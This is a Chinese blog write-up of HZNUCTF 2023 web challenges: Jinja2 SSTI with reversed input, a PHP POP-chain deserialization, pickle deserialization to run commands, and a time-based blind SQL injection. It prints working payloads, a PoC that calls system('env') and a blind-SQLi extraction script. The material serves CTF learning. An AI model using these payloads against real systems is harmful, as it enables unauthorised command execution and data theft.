HZNUCTF2023中web相关题目

已于 2024-08-05 14:43:11 修改
阅读量968 收藏 24
点赞数 20
分类专栏: CTF知识及赛题 文章标签: 前端 java 开发语言
于 2024-07-18 20:42:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78903258/article/details/140518720
版权

[HZNUCTF 2023 preliminary]guessguessguess

这道题目打不开了

[HZNUCTF 2023 preliminary]flask

这道题目考察SSTI倒序的模板注入,以及用env命令获得flag

看题目,猜测是SSTI模板注入,先输入{7*7},发现模板是倒序输入的

输入}}'7'*7{{返回777777,为jinja2模板

这里放上python倒序代码

import base64

strA = input('需要转换的字符:')
strB=strA[::-1]
sbase=str(base64.b64encode(strB.encode("utf-8")), "utf-8")   #base


print(strB)   #base不能直接编码,要先换成byte类型,直接在线网站编码

接着我们构造payload,找出flag文件 

?name=}})')(daer.)"/ sl"(nepop.)"so"(__tropmi__'(lave.]'__snitliub__'[__slabolg__.__tini__.a{{

发现flag在flag.sh文件下,给出下面提示flag又不在这里

?name=}})')(daer.)"hs.galf/ cat"(nepop.)"so"(__tropmi__'(lave.]'__snitliub__'[__slabolg__.__tini__.a{{

接着给出提示/bin/bash,接着我们构造payload,看看此文件,发现出现2个文件 ,查询文件无果

 ?name=}})')(daer.)"sl;hsab/nib/ dc"(nepop.)"so"(__tropmi__'(lave.]'__snitliub__'[__slabolg__.__tini__.a{{

 接着用env命令查看一下环境变量

?name=}})')(daer.)"vne"(nepop.)"so"(__tropmi__'(lave.]'__snitliub__'[__slabolg__.__tini__.a{{

[HZNUCTF 2023 preliminary]ppppop 

这道题目考察php反序列化及pop链的构建

打开这道题目发现一片空白,检查网络中的数据包,发现cookie中存在base64编码值,进行解码

 

 解码之后发现字符串中有一个布尔值,空白原因可能是布尔值为0,一般来说0表示false,我们将0修改为1再进行base64编码,再将编码后的值替代之前cookie值发包

 得到下面php代码,其中涉及到魔术引号以及函数

在对象中调用一个不可访问方法时,__call() 会被调用

$name 参数是要调用的方法名称。$arguments 参数是一个枚举数组,包含着要传递给方法 $name 的参数

strrev() 函数反转字符串

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}




?>

得到源码后就是反序列化构造pop链了,不难看出是通过A类来触发B类中的__call从而实现任意命令,执行后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。所以我们构造pop链如下:

poc如下:

<?php
error_reporting(0);
include('utils.php');
 
class A {
    public $className="B";
    public $funcName="system";
    public $args="env";
 
    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}
 
class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}
 
$a=new A();
echo(base64_encode(strrev(serialize($a))));
?>

这里在B类中调用system没有直接触发__call方法并将system作为参数传入__call中造成执行系统命令来查看环境变量从而得到flag 

[HZNUCTF 2023 preliminary]pickle 

打开题目,右键查看源代码,在pycharm中格式化


import base64
import pickle
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()


@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"


@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0')

发现有两个可以访问的页面:/calc和/readFile。由于calc下面的语句有一个getFlag,我认为flag应该是在这里拿到的。然后往下看,需要get传参payload,然后用base64解码payload,然后pickle.loads被过滤os的解码代码。先去查了pickle的用法,发现是python里的序列化和反序列化函数。看看WP文章 - [HZNUCTF 2023 preliminary]pickle jmx0hxq的WriteUp | NSSCTF

payload:/readFile?filename=a 

 下面一些是其他博主对代码的解释:

1. 首先,python代码里先进行return以覆盖下一个return的返回值。所以本题可以让反序列化之后的值先进行return的操作。

2. 然后本题中return的那段:

return eval,("__import__('o'+'s').system('env | tee a')",)  
 这段的意思,有两个元素用逗号隔开return,就是一个可以执行eval的特性。

3. 其中还有一个__import__('os')语句的意思,就是在中途导入os模块,并且将__import__('os')这一段变成'os'。

4.python中,os就是可以调用system的函数:

os模块负责程序与操作系统的交互,提供了访问操作系统底层的接口;即os模块提供了非常丰富的方法用来处理文件和目录。

所以os.system('ls /')也是可以读取根目录的。但是由于eval函数没有回显,所以用tee将内容复制到a.txt,然后再用/readFile函数读取文件就可以了

所以payload:

/calc?payload=gASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnbycrJ3MnKS5zeXN0ZW0oJ2xzIC8gfCB0ZWUgYScplIWUUpQu

 然后读取a文件:/readFile?filename=a

[HZNUCTF 2023 preliminary]ezlogin

这道题目考察sql的盲注,并且带有过滤

打开题目,查看网页源代码,可以知道注入点在username上,且为POST传参,注入进行了关键字的过滤

过滤and      ==》&&    //我直接or了
过滤database ==》Database
过滤空格      ==》/**/                    
过滤=        ==》like

发现没有显示报错界面,只能用盲注试试了,下面是别人的脚本代码

import requests
import base64
import datetime

url='http://node5.anna.nssctf.cn:28144/'
flag = ''

for i in range(1,100):
    low = 32
    high = 130
    mid = (high + low) // 2
    while (low < high):
        payload = "1'||if((ascii(substr((SELECT/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1)))>{},sleep(1),1)#"

        payload = payload.format(i, mid)
        print(payload)
        payload = base64.b64encode(payload[::-1].encode("utf-8"))
        data = {
            'username':payload,
            'passwd':'1'
        }
        time1 = datetime.datetime.now()
        r = requests.post(url, data)
        time2 = datetime.datetime.now()
        time = (time2 - time1).seconds
        if time > 1:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if (mid == 32 or mid == 130):
        break
    flag += chr(mid)
    print(flag)

爆库名
# payload = "1'||if((ascii(substr((DATABASE()),{},1)))>{},sleep(1),1)#"

爆表名
# payload = "1'||if((ascii(substr((SELECT/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/DATABASE()),{},1)))>{},sleep(1),1)#"

爆列名
# payload = "1'||if((ascii(substr((SELECT/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'user'),{},1)))>{},sleep(1),1)#"

爆数据
# payload = "1'||if((ascii(substr((SELECT/**/group_concat(Password)/**/from/**/users.user),{},1)))>{},sleep(1),1)#"

这样慢慢的等着跑出来就好了

Paranoid144
关注
专栏目录
CTF题型 Pythonpickle反序列化进阶利用&amp;例题&amp;opache绕过(1)
2401_84009579的博客
04-20 1026
机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
CTF题型 Pythonpickle反序列化进阶利用&amp;例题&amp;opache绕过
m0_60607895的博客
05-05 1111
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。它可以在对象从其序列化状态恢复时,对对象进行自定义的状态还原。构造方法,在反序列化的时候自动执行,类似于php的_常用payload(没有os模块)
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
Jay17的博客
08-16 1460
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
每日练习-[HZNUCTF 2023 preliminary]flask
m0_68113265的博客
08-20 365
页面内容要求get一个name经过测试,只对语句进行倒序。查到os在132同时flag不在flag文件。猜测flag在env
[HZNUCTF 2023 preliminary]pickle
2301_80243833的博客
08-27 335
它从请求的参数获取名为 filename 的值,然后将这个值的 “flag” 替换为 “?如果这个字节串不是合法的序列化对象,或者在反序列化过程出现问题,可能会引发错误。pickle:Python 的对象序列化和反序列化模块,可以将 Python 对象转换为字节流进行存储或传输,也可以从字节流恢复对象。(‘o’+‘s’).system(‘env | tee a’)”,):这里返回一个元组,包含两个元素。接着使用 .replace(b’os’, b’') 将解码后的字节串的 os 替换为空字节串。
pickle反序列化
rev1ve的博客
12-22 1659
与PHP类似,python也有序列化功能以长期储存内存的数据。pickle是python下的序列化与反序列化包。python有另一个更原始的序列化包marshal,现在开发时一般使用pickle。与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型。
HZNUCTF2023 web
weixin_63231007的博客
05-07 1838
HZNUCTF校赛 赛后复现
NSSCTF第13页(3)
wwwwyyyrre的博客
11-29 229
所以注册用户admin'--并修改密码就可以登录admin,在home页面的查询有两种回显,exist或no user,显然是布尔盲注,需要注意的是数据库是sqlite,查询语句不太一样。print(("%s表的%s字段数据: " + data) % (tab_name, col_name))先注册一个admin'--+ 因为admin'#报错了,用这个注册的admin来覆盖之前的那个admin。#使用时改一下Success_message、url!tbl_name:记录所从属的表名,如索引所在的表名。
CTF web题 wp:
weixin_45694388的博客
10-11 1086
1.签到题 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一题界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次base64后,观察格式后发现是hex编码,解码出flag 3.Decoede me 一道php的加密题 strrev(): 逆序 substr(): 返回字符串第0以后的1位ord():ord()函数返回字符串的首个字符的ASCII值。chr():从ascii表返回第_0以后的1位 ord(): or
CTF-REVERSE练习之逆向初探
ChuMeng1999的博客
11-26 3370
目录预备知识一、了解REVERSE二、PEiD三、Ollydbg四、IDA实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、了解REVERSE REVERSE是CTF竞赛的一种常见题目类型,主要考察参赛选手逆向工程相关的知识,考查形式为通过对一个二进制程序(exe、dll或者是elf等)进行逆向分析,了解程序内部的实现机制,最终目的可能是得到一个密码,或者是编写一个注册机用于计算指定用户名对应的注册码等。 二、PEiD PEiD是一款著名的查壳工具,其功能十分强大,几乎可以侦测出绝大部分的壳以
NSSCTF-[HZNUCTF 2023 preliminary]-web
J1ng_Hong的博客
11-13 579
进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。由于序列化的b代表着Boolean,所以我试着把0改为1。然后我们就看到了回显,但是没找到flag。
NSSCTF做题第9页(2)
wwwwyyyrre的博客
10-25 393
这道题主要有三个绕过点,第一个是__wakeup()函数,第二个是变量的MD5相等,但是两个变量不等那需要我们构造的两个类就是class lt和class fin构造的时候设置一个变量a,创建了一个类的对象lt然后把md5的条件满足一下,而这类的第一个变量$impo没有用到就可以利用它来指向下一个新创建的变量class fin,再利用fin里边的公共变量进行命令执行得到flagphpclass ltclass finpublic $a;
HSCSEC CTF 2023 web-EZSYFLASK-wp
……
02-24 335
flask的PIN码攻击
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1745
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
(反序列化)[HZNUCTF 2023 preliminary]ppppop
weixin_73668856的博客
12-08 552
简单的
[HZNUCTF 2023 preliminary]ppppop
m0_70819573的博客
04-22 476
base64解密后得到序列化的字符串:O:4:"User":1:{s:7:"isAdmin";很简单的pop链构造,class A __destruct()->class B __call()通过抓包可以发现base64加密的user cookie。通过payloadpost传参获得flag。1.代开环境,发现一片空白。将零改为一后可以显示源码了。
[HZNUCTF 2023 preliminary]flask
最新发布
2301_80243833的博客
08-28 485
我们需要让用户输入一个字符串,对其进行反转操作,然后将反转后的字符串进行 Base64 编码,最后输出反转后的字符串。
HZNUCTF2023部分wp-Reverse
m0_73393932的博客
04-04 855
逆向
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值